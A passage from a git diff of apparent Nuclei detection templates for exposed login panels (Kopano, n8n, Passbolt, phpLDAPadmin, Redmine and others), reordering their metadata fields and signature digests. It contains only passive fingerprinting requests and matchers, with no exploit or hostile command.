4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/kopano-webapp-panel.yaml b/http/exposed-panels/kopano-webapp-panel.yaml index e921310f0d..e47b571bcb 100644 --- a/http/exposed-panels/kopano-webapp-panel.yaml +++ b/http/exposed-panels/kopano-webapp-panel.yaml @@ -7,16 +7,16 @@ info: description: Kopano WebApp login panel was detected. reference: - https://kopano.com/ + classification: + cpe: cpe:2.3:a:kopano:webapp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Kopano WebApp" - product: webapp vendor: kopano + product: webapp + shodan-query: http.title:"Kopano WebApp" tags: panel,kopano,login,detect - classification: - cpe: cpe:2.3:a:kopano:webapp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,7 +24,6 @@ http: host-redirects: true max-redirects: 2 - matchers: - type: dsl dsl: @@ -38,4 +37,5 @@ http: group: 1 regex: - '\?kv([0-9.]+)"' -# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/label-studio-panel.yaml b/http/exposed-panels/label-studio-panel.yaml index 394fff0f40..30b241cc87 100644 --- a/http/exposed-panels/label-studio-panel.yaml +++ b/http/exposed-panels/label-studio-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | Detects the presence of the Label Studio Login Page. + classification: + cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-1649949475 - product: label_studio vendor: heartex + product: label_studio + shodan-query: http.favicon.hash:-1649949475 tags: label-studio,login,panel - classification: - cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:* http: - raw: - | @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/librephotos-panel.yaml b/http/exposed-panels/librephotos-panel.yaml index 8b7ea8368b..7cf442a9fe 100644 --- a/http/exposed-panels/librephotos-panel.yaml +++ b/http/exposed-panels/librephotos-panel.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://github.com/LibrePhotos/librephotos + classification: + cpe: cpe:2.3:a:librephotos_project:librephotos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"LibrePhotos" - product: librephotos vendor: librephotos_project + product: librephotos + shodan-query: title:"LibrePhotos" tags: panel,librephotos,detect,login - classification: - cpe: cpe:2.3:a:librephotos_project:librephotos:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: status: - 200 - 404 -# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/mitel-micollab-panel.yaml b/http/exposed-panels/mitel-micollab-panel.yaml index 2dac80fdf0..8f6665c7e0 100644 --- a/http/exposed-panels/mitel-micollab-panel.yaml +++ b/http/exposed-panels/mitel-micollab-panel.yaml @@ -8,16 +8,16 @@ info: Mitel MiCollab login panel was detected. reference: - https://www.mitel.com/products/micollab-miteam-meetings-collaboration-software + classification: + cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:-:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"MiCollab End User Portal" - product: micollab vendor: mitel + product: micollab + shodan-query: http.html:"MiCollab End User Portal" tags: panel,mitel,login,detect - classification: - cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:-:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "micollab", "mitel_logo", "com.mitel.mas.portal.domain")' condition: and -# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/mobileiron-sentry.yaml b/http/exposed-panels/mobileiron-sentry.yaml index bd58c6943d..fdb353ea27 100644 --- a/http/exposed-panels/mobileiron-sentry.yaml +++ b/http/exposed-panels/mobileiron-sentry.yaml @@ -7,16 +7,16 @@ info: description: MobileIron Sentry panel was detected. reference: - https://help.ivanti.com/mi/help/en_us/sntry/9.9.0/gdcl/Content/SentryGuide/MobileIron_Sentry_overvi.htm + classification: + cpe: cpe:2.3:a:mobileiron:sentry:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:967636089 - product: sentry vendor: mobileiron + product: sentry + shodan-query: http.favicon.hash:967636089 tags: panel,mobileiron - classification: - cpe: cpe:2.3:a:mobileiron:sentry:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: group: 1 regex: - \?([\d.]+)" -# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml index 5b5c0359cc..2f92900982 100644 --- a/http/exposed-panels/monitorr-panel.yaml +++ b/http/exposed-panels/monitorr-panel.yaml @@ -4,17 +4,17 @@ info: name: Monitorr Panel - Detect author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:monitorr:monitorr:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: monitorr + product: monitorr shodan-query: http.favicon.hash:-211006074 fofa-query: icon_hash="-211006074" - product: monitorr - vendor: monitorr tags: panel,monitorr,detect - classification: - cpe: cpe:2.3:a:monitorr:monitorr:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +26,5 @@ http: - 'status_code == 200' - 'contains_any(body, "content=\"Monitorr", "Monitorr is loading", "title=\"Monitorr Settings")' condition: and -# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/moodle-workplace-panel.yaml b/http/exposed-panels/moodle-workplace-panel.yaml index 39a8a1c0b2..ec2753fe5e 100644 --- a/http/exposed-panels/moodle-workplace-panel.yaml +++ b/http/exposed-panels/moodle-workplace-panel.yaml @@ -8,16 +8,16 @@ info: Moodle workplace login panel was detected. reference: - https://moodle.com/solutions/workplace/ + classification: + cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"moodle" - product: moodle vendor: moodle + product: moodle + shodan-query: http.html:"moodle" tags: panel,moodle,login,detect - classification: - cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - 'status_code == 200' - 'contains_any(body, "content=\"moodle", "\"name\":\"moodle\"") && contains(body, "workplace")' condition: and -# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index fdcb667598..eff9b03fe4 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -8,16 +8,16 @@ info: The worlds most popular workflow automation platform for technical teams reference: - https://n8n.io/ + classification: + cpe: cpe:2.3:a:n8n:n8n:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-831756631 - product: n8n vendor: n8n + product: n8n + shodan-query: http.favicon.hash:-831756631 tags: panel,n8n,login,detect - classification: - cpe: cpe:2.3:a:n8n:n8n:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/netflow-analyzer-panel.yaml b/http/exposed-panels/netflow-analyzer-panel.yaml index 4939419828..c858f5edaf 100644 --- a/http/exposed-panels/netflow-analyzer-panel.yaml +++ b/http/exposed-panels/netflow-analyzer-panel.yaml @@ -4,16 +4,16 @@ info: name: Netflow Analyzer Login - Panel author: DhiyaneshDk severity: info - metadata: - shodan-query: html:"Login - Netflow Analyzer" - verified: true - max-request: 1 - product: manageengine_netflow_analyzer - vendor: zohocorp - tags: netflow,analyzer,panel,login - classification: cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_netflow_analyzer + shodan-query: html:"Login - Netflow Analyzer" + tags: netflow,analyzer,panel,login + http: - raw: - | @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 07d08c657f..3b0b102269 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -9,16 +9,16 @@ info: reference: - https://www.nocodb.com/ - https://docs.nocodb.com/ + classification: + cpe: cpe:2.3:a:xgenecloud:nocodb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: "http.favicon.hash:206985584" - product: nocodb vendor: xgenecloud + product: nocodb + shodan-query: "http.favicon.hash:206985584" tags: panel,nocodb,login,detect - classification: - cpe: cpe:2.3:a:xgenecloud:nocodb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/dashboard/favicon.ico" stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -37,4 +38,5 @@ http: - type: dsl dsl: - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" -# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/openedge-panel.yaml b/http/exposed-panels/openedge-panel.yaml index c97d8d51bf..55b4c627ec 100644 --- a/http/exposed-panels/openedge-panel.yaml +++ b/http/exposed-panels/openedge-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | An OpenEdge login panel was detected. - metadata: - shodan-query: html:"Welcome to Progress Application Server for OpenEdge" - verified: true - max-request: 1 - product: openedge - vendor: progress - tags: panel,openedge,login,detect - classification: cpe: cpe:2.3:a:progress:openedge:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: progress + product: openedge + shodan-query: html:"Welcome to Progress Application Server for OpenEdge" + tags: panel,openedge,login,detect + http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/openvas-panel.yaml b/http/exposed-panels/openvas-panel.yaml index 8bdf2c1167..7ded3e423f 100644 --- a/http/exposed-panels/openvas-panel.yaml +++ b/http/exposed-panels/openvas-panel.yaml @@ -8,16 +8,16 @@ info: An OpenVas Admin login panel was detected. reference: - https://openvas.org/ + classification: + cpe: cpe:2.3:a:openvas:openvas_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:1606029165 - product: openvas_manager vendor: openvas + product: openvas_manager + shodan-query: http.favicon.hash:1606029165 tags: panel,openvas,admin,login - classification: - cpe: cpe:2.3:a:openvas:openvas_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml index 41677af723..a87e8c1507 100644 --- a/http/exposed-panels/oracle-ebusiness-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -8,16 +8,16 @@ info: Oracle E-Business Suite login panel was detected. reference: - https://www.oracle.com/applications/ebusiness/ + classification: + cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"Oracle UIX" - product: e-business_suite vendor: oracle + product: e-business_suite + shodan-query: http.html:"Oracle UIX" tags: panel,oracle,login,detect - classification: - cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,7 +25,6 @@ http: redirects: true max-redirects: 2 - matchers: - type: dsl dsl: @@ -39,4 +38,5 @@ http: group: 1 regex: - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' -# digest: 4a0a00473045022100c2d6e8e3ce8ee5591c514fe83e3b5e87117757540fd00c7e89f532f3ffc93bd502204d33d1e6f2e9f52a95ada84d8fd2b1fc188c6e3a2b9153b6004d90885e40646f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c2d6e8e3ce8ee5591c514fe83e3b5e87117757540fd00c7e89f532f3ffc93bd502204d33d1e6f2e9f52a95ada84d8fd2b1fc188c6e3a2b9153b6004d90885e40646f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/outsystems-servicecenter-panel.yaml b/http/exposed-panels/outsystems-servicecenter-panel.yaml index 1006091418..e55b85ebfc 100644 --- a/http/exposed-panels/outsystems-servicecenter-panel.yaml +++ b/http/exposed-panels/outsystems-servicecenter-panel.yaml @@ -8,16 +8,16 @@ info: OutSystems Service Center login panel was detected. reference: - https://www.outsystems.com/ + classification: + cpe: cpe:2.3:a:outsystems:platform_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: "http.html:\"outsystems\"" - product: platform_server vendor: outsystems + product: platform_server + shodan-query: "http.html:\"outsystems\"" tags: panel,outsystems,login,detect - classification: - cpe: cpe:2.3:a:outsystems:platform_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: group: 1 regex: - 'environmentName:.?([a-z0-9A-Z\s]+).?' -# digest: 4b0a00483046022100b561430758a0cf58edbf3bef078e66e32075286652260a4db6e3486d1962ef16022100a7239cd818f68cca62f8c16189723de1574d542908852c92cbbc5d86074c06a5:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100b561430758a0cf58edbf3bef078e66e32075286652260a4db6e3486d1962ef16022100a7239cd818f68cca62f8c16189723de1574d542908852c92cbbc5d86074c06a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/passbolt-panel.yaml b/http/exposed-panels/passbolt-panel.yaml index 5bb8e177d7..1fc6fd5b3e 100644 --- a/http/exposed-panels/passbolt-panel.yaml +++ b/http/exposed-panels/passbolt-panel.yaml @@ -8,16 +8,16 @@ info: Passbolt login panel was detected. reference: - https://www.passbolt.com/ + classification: + cpe: cpe:2.3:a:passbolt:passbolt_api:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Passbolt | Open source password manager for teams" - product: passbolt_api vendor: passbolt + product: passbolt_api + shodan-query: http.title:"Passbolt | Open source password manager for teams" tags: panel,passbolt,login - classification: - cpe: cpe:2.3:a:passbolt:passbolt_api:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: group: 1 regex: - '(?i)v=([0-9a-z.-]+)' -# digest: 4a0a00473045022100a88014cf962ec6f61e44d7dbe62cef11b6b5a22d5110345bdaaa9b10872089f20220551fd9f9a94363c082c57e1f5618537241e20297383a8313ff2bf7ef0317111c:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a88014cf962ec6f61e44d7dbe62cef11b6b5a22d5110345bdaaa9b10872089f20220551fd9f9a94363c082c57e1f5618537241e20297383a8313ff2bf7ef0317111c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index be97e98ba2..0d9107333d 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -4,16 +4,16 @@ info: name: PHP LDAP Admin Panel - Detect author: ritikchaddha,DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: title:"phpLDAPadmin" - product: phpldapadmin vendor: phpldapadmin_project + product: phpldapadmin + shodan-query: title:"phpLDAPadmin" tags: php,phpldapadmin,panel,detect - classification: - cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,5 @@ http: group: 1 regex: - '<div id="ajFOOT">([0-9.]+)<\/div>' -# digest: 490a00463044022065e92a16562f4a5df1f0055d74193cd5dc32662c3176ee099b23644fb0e5f5cb02203643298e7db07f9b93d1dca6e1b8f47dc42f647ebef4d6fe24715cced3a9d2c4:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022065e92a16562f4a5df1f0055d74193cd5dc32662c3176ee099b23644fb0e5f5cb02203643298e7db07f9b93d1dca6e1b8f47dc42f647ebef4d6fe24715cced3a9d2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/posteio-admin-panel.yaml b/http/exposed-panels/posteio-admin-panel.yaml index c634b1aaad..567c560858 100644 --- a/http/exposed-panels/posteio-admin-panel.yaml +++ b/http/exposed-panels/posteio-admin-panel.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: info description: Poste.io login panel was detected. + classification: + cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Administration login" html:"poste<span" - product: poste.io vendor: analogic + product: poste.io + shodan-query: title:"Administration login" html:"poste<span" tags: panel,poste,login,detect - classification: - cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d11de7670596406fc1fd665bf0263ae0c764b93ef1c083ccea64f3d02960c87022100b523f619b615dc23cb8688226e2da8ba06edb3fcdc62cb3676b0f8f9f35e4111:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502206d11de7670596406fc1fd665bf0263ae0c764b93ef1c083ccea64f3d02960c87022100b523f619b615dc23cb8688226e2da8ba06edb3fcdc62cb3676b0f8f9f35e4111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index b1400e5076..eb9c747ee6 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -8,16 +8,16 @@ info: QlikView AccessPoint login panel was detected. reference: - https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm + classification: + cpe: cpe:2.3:a:qlik:qlikview:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"QlikView - AccessPoint" - product: qlikview vendor: qlik + product: qlikview + shodan-query: title:"QlikView - AccessPoint" tags: panel,qlikview,login,detect - classification: - cpe: cpe:2.3:a:qlik:qlikview:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,11 +25,11 @@ http: host-redirects: true max-redirects: 2 - matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")' condition: and -# digest: 4b0a00483046022100fd769581cf8ef26ad1381e88e03b3c3bf12d690e1706450035b5bbe1bd65e702022100902e9ddaaf2b3d12375f96fc62e4f11564019235b79a0e5b61cc37a64b3d95d7:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fd769581cf8ef26ad1381e88e03b3c3bf12d690e1706450035b5bbe1bd65e702022100902e9ddaaf2b3d12375f96fc62e4f11564019235b79a0e5b61cc37a64b3d95d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/redis-enterprise-panel.yaml b/http/exposed-panels/redis-enterprise-panel.yaml index f25a55fd90..6603c37410 100644 --- a/http/exposed-panels/redis-enterprise-panel.yaml +++ b/http/exposed-panels/redis-enterprise-panel.yaml @@ -4,16 +4,16 @@ info: name: Redis Enterprise - Detect author: tess severity: info + classification: + cpe: cpe:2.3:a:redis:redis_enterprise:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Enterprise-Class Redis for Developers" - product: redis_enterprise vendor: redis + product: redis_enterprise + shodan-query: title:"Enterprise-Class Redis for Developers" tags: panel,redis,enterprise - classification: - cpe: cpe:2.3:a:redis:redis_enterprise:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f6c08f44dd05a50b4b45b00db29b66f006f3d5e8e33576fbc9171aedee91115022100dee17012ef53687681c6bc3886f57cbd4c4ed8b349cf2acec25e71f4c7577231:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200f6c08f44dd05a50b4b45b00db29b66f006f3d5e8e33576fbc9171aedee91115022100dee17012ef53687681c6bc3886f57cbd4c4ed8b349cf2acec25e71f4c7577231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/redmine-panel.yaml b/http/exposed-panels/redmine-panel.yaml index ccb9179d78..4acd66a7af 100644 --- a/http/exposed-panels/redmine-panel.yaml +++ b/http/exposed-panels/redmine-panel.yaml @@ -7,16 +7,16 @@ info: description: Redmine login panel was detected. reference: - https://www.redmine.org/ + classification: + cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:'content="Redmine' - product: redmine vendor: redmine + product: redmine + shodan-query: http.html:'content="Redmine' tags: panel,redmine,login,detect - classification: - cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +28,5 @@ http: - 'status_code == 200' - 'contains(body, "content=\"Redmine")' condition: and -# digest: 4b0a00483046022100d9b0e50f13ca98e0c3ba5e2eb5b76dd14fb16facbc34ae8219a36072b8d47820022100e0a32cf92100515311bb77cc9b08b53d355faaaeb067385a4ee3a91cf0f842e9:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100d9b0e50f13ca98e0c3ba5e2eb5b76dd14fb16facbc34ae8219a36072b8d47820022100e0a32cf92100515311bb77cc9b08b53d355faaaeb067385a4ee3a91cf0f842e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/rocketchat-panel.yaml b/http/exposed-panels/rocketchat-panel.yaml index 3fd871a8f7..a0ba831043 100644 --- a/http/exposed-panels/rocketchat-panel.yaml +++ b/http/exposed-panels/rocketchat-panel.yaml @@ -7,16 +7,16 @@ info: description: RocketChat login panel was detected. reference: - https://www.rocket.chat/ + classification: + cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Rocket.Chat" - product: rocket.chat vendor: rocket.chat + product: rocket.chat + shodan-query: http.title:"Rocket.Chat" tags: panel,rocketchat,login,detect - classification: - cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - 'status_code == 200' - 'contains_any(body, "<title>Rocket.Chat", "content=\"Rocket.Chat")' condition: and -# digest: 490a004630440220033e04196ae5d3e3dfa2d2e4002c34f06bd31d9033b6ca3fe79b1e4b98f8285f02201d5223d270c17cdb518372cdc2092703bfa4adb03532a5a62a71ba226c7fa05d:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220033e04196ae5d3e3dfa2d2e4002c34f06bd31d9033b6ca3fe79b1e4b98f8285f02201d5223d270c17cdb518372cdc2092703bfa4adb03532a5a62a71ba226c7fa05d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/scriptcase/scriptcase-panel.yaml b/http/exposed-panels/scriptcase/scriptcase-panel.yaml index a11079da5a..64a612a5f6 100644 --- a/http/exposed-panels/scriptcase/scriptcase-panel.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-panel.yaml @@ -7,16 +7,16 @@ info: reference: - https://www.scriptcase.com.br - https://www.scriptcase.net + classification: + cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"ScriptCase" - product: scriptcase vendor: scriptcase + product: scriptcase + shodan-query: title:"ScriptCase" tags: panel,scriptcase - classification: - cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +45,5 @@ http: group: 2 regex: - '(Versão|Version|Versão)\b.*\s(\d.*\d)' -# digest: 